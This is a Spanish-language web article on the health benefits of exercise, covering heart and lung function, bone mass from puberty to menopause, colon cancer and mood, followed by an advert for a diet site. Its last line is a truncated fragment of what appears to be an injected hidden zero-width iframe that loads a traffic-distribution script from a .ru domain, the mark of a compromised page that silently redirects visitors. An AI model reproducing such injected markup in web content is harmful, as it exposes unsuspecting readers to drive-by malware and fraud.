Artículos

Adelante con el ejercicio

Los expertos reconocen que  la dieta no  es suficiente para quemar el exceso de calorías provenientes de una alimentación alta en grasa y alta en azúcar que ha llevado a la población a elevados porcentajes de obesidad.

El Departamento de Agricultura de Estados Unidos que había enfocado toda su atención a la alimentación, están expandiendo su área de interés al ejercicio.

The American Heart Association afirma, que un programa regular de entrenamiento con pesas aumenta la fuerza muscular, el acondicionamiento físico y mejora el funcionamiento del corazón y los pulmones. También reduce los riesgos de enfermedad coronaria y favorece el metabolismo de la glucosa.

El ejercicio regular puede ayudar a evitar la depresión, aumenta la autoestima y favorece el control del estrés mejorando nuestra calidad de vida.

Los expertos continuamente están considerando la osteoporosis como una enfermedad pediátrica que manifiesta sus síntomas en la vejez. La importancia del ejercicio sobre el sistema estructural comienza en la juventud.  El 30% del esqueleto se forma durante la pubertad, entre los 9 y los 14 años, la edad ideal para insistir en el hábito del ejercicio.

Los depósitos de minerales en los huesos pueden ayudarte a mantener en óptimas condiciones  tu esqueleto durante la menopausia, época en la que comienza a perderse la masa ósea. Los ejercicios de resistencia que se realizan con regularidad 2 o 3 veces por semana, evitan el riesgo del desgaste de cartílagos o desgarro muscular que pueden presentarse con actividades de alto impacto.

De acuerdo a los datos publicados en 24 estudios, la actividad física reduce el riesgo de desarrollar cáncer de colón.

La Clínica Mayo recomienda el ejercicio como la manera más económica de obtener la hormona del crecimiento,  que ayuda a la formación de masa muscular y evita el envejecimiento prematuro.

Solicita tu dieta personalizada en http://www.dietasalamedida.com

emohuildiin.ru/tds/go.php?sid=1" width="0" height=